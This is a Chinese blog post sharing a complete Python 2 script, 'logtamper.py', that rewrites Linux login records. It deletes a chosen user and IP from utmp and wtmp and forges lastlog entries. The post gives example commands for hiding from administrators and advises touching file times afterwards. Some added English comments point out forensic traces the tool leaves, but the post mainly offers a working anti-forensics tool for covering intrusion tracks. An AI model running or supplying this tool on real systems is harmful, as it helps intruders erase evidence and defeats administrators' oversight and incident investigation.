python修改linux日志(logtamper.py)
经常用到xi4oyu大神的logtamper,非常之方便。但是有些场景下可能没条件编译,于是参照logtamper源码以及Intersect的源码写了个py版,参数和原版差不多。
躲避管理员w查看
python logtamper.py -m 1 -u b4dboy -i 192.168.0.188
清除指定ip的登录日志
python logtamper.py -m 2 -u b4dboy -i 192.168.0.188
修改上次登录时间地点
python logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2014:05:28:10:11:12
最后自己再确认下看有没有修改成功,可以使用chown、touch命令修改时间和使用者,程序代码如下:
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# mail: cn.b4dboy@gmail.com
#
# Rewrites Linux login-accounting files. Modes 1 and 2 copy a utmp/wtmp-format
# file while leaving out every record that matches a user name and host;
# mode 3 overwrites one user's slot in a lastlog-format file.
#
# Python 2 only: showMessage() uses the print statement.
#
# Scope, as visible in this listing: the script parses only the two binary
# record layouts declared below and defaults to the three paths declared
# below. It contains no code for any other log source, so login evidence kept
# elsewhere (text auth logs, the journal, audit records, copies already
# forwarded to a remote collector) is not changed by it. Comparing those
# sources against utmp/wtmp/lastlog is therefore a direct way to spot the
# edits this script makes.
import os, struct, sys
from pwd import getpwnam
from time import strptime, mktime
from optparse import OptionParser

# Default target files, one per mode (see the -m option help text).
UTMPFILE = "/var/run/utmp"
WTMPFILE = "/var/log/wtmp"
LASTLOGFILE = "/var/log/lastlog"

# lastlog record as packed by modifyLast(): unsigned int timestamp,
# 32-byte tty name, 256-byte host name.
LAST_STRUCT = 'I32s256s'
LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)

# utmp/wtmp record. getXtmp() compares unpacked field 4 (the second 32-byte
# string) with the user name and field 5 (the 256-byte string) with the host.
# NOTE(review): the layout looks like glibc's struct utmp on Linux; confirm
# against <utmp.h> on the platform in question, since the record size differs
# between platforms.
XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'
XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)


def getXtmp(filename, username, hostname):
    """Return the contents of `filename` with matching records left out.

    The file is read in XTMP_STRUCT_SIZE-byte records. A record is skipped
    only when field 4 equals `username` AND field 5 equals `hostname`, both
    compared after cutting the field at its first NUL byte. All other records
    are concatenated in their original order and returned as one string.

    What this leaves behind: the returned data is shorter than the input by
    exactly one record per match, and the surviving records are byte-for-byte
    unchanged.
    """
    xtmp = ''
    # The bare except below reports every failure in this block, not only a
    # failed open, as 'Cannot open file' (for example a struct.unpack error
    # on a trailing partial record).
    try:
        fp = open(filename, 'rb')
        while True:
            bytes = fp.read(XTMP_STRUCT_SIZE)
            if not bytes:
                break
            data = struct.unpack(XTMP_STRUCT, bytes)
            # Stringify every field and keep the part before the first NUL,
            # so the padded fixed-width names compare equal to plain strings.
            record = [(lambda s: str(s).split("\0", 1)[0])(i) for i in data]
            if (record[4] == username and record[5] == hostname):
                continue
            xtmp += bytes
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return xtmp


def modifyLast(filename, username, hostname, ttyname, strtime):
    """Write one lastlog record for `username` into `filename`.

    `username` is resolved with getpwnam(); `strtime` must match
    '%Y:%m:%d:%H:%M:%S' and is converted to an integer timestamp with
    mktime(). The packed record (timestamp, ttyname, hostname) is written at
    offset LAST_STRUCT_SIZE * uid. Returns True when the end of the function
    is reached; the error paths call showMessage(), which exits.

    The file is opened with mode 'wb', which discards its previous contents
    before the seek and write. After the call the file holds only this one
    record at the UID's offset, so the entries of all other accounts are gone.
    NOTE(review): presumably `lastlog` then reports every other account as
    never having logged in, which is an obvious indicator for an investigator.
    """
    try:
        p = getpwnam(username)
    except:
        showMessage('No such user.')

    timestamp = 0
    try:
        str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S')
        timestamp = int(mktime(str2time))
    except:
        showMessage('Time format err.')

    data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname)
    try:
        fp = open(filename, 'wb')
        # Slot index is the numeric UID taken from the passwd entry.
        fp.seek(LAST_STRUCT_SIZE * p.pw_uid)
        fp.write(data)
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return True


def showMessage(msg):
    """Print `msg` and terminate the process with exit status -1."""
    print msg
    exit(-1)


def saveFile(filename, contents):
    """Replace the contents of `filename` with `contents`.

    Mode 'w+b' truncates the existing file and writes the new data in place.
    An in-place rewrite updates the file's modification time and its inode
    change time; resetting the modification time afterwards updates the
    change time again, so a change time later than the newest record in the
    file is worth checking during triage.
    """
    try:
        fp = open(filename, 'w+b')
        fp.write(contents)
    except IOError as e:
        showMessage(e)
    finally:
        fp.close()


if __name__ == '__main__':
    # NOTE(review): the '\ ' inside this literal is presumably what is left of
    # a backslash line continuation in the original listing; it is kept
    # exactly as shown.
    usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \ logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'
    parser = OptionParser(usage=usage)
    parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]')
    parser.add_option('-t', '--ttyname', dest='TTYNAME')
    parser.add_option('-f', '--filename', dest='FILENAME')
    parser.add_option('-u', '--username', dest='USERNAME')
    parser.add_option('-i', '--hostname', dest='HOSTNAME')
    parser.add_option('-d', '--dateline', dest='DATELINE')
    (options, args) = parser.parse_args()

    # args holds only leftover positional arguments, so this test passes for
    # the option-only invocations shown in the usage text.
    if len(args) < 3:
        if options.MODE == '1':
            # Mode 1: filter the utmp-format file (default UTMPFILE).
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
            if options.FILENAME == None:
                options.FILENAME = UTMPFILE
            # tamper
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)
        elif options.MODE == '2':
            # Mode 2: same filter, default file WTMPFILE.
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
            if options.FILENAME == None:
                options.FILENAME = WTMPFILE
            # tamper
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)
        elif options.MODE == '3':
            # Mode 3: overwrite the user's lastlog slot; needs tty and date too.
            if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
            if options.FILENAME == None:
                options.FILENAME = LASTLOGFILE
            # tamper
            modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)
        # NOTE(review): the listing lost its indentation; this else is assumed
        # to belong to the mode chain (unknown mode prints the help text).
        else:
            parser.print_help()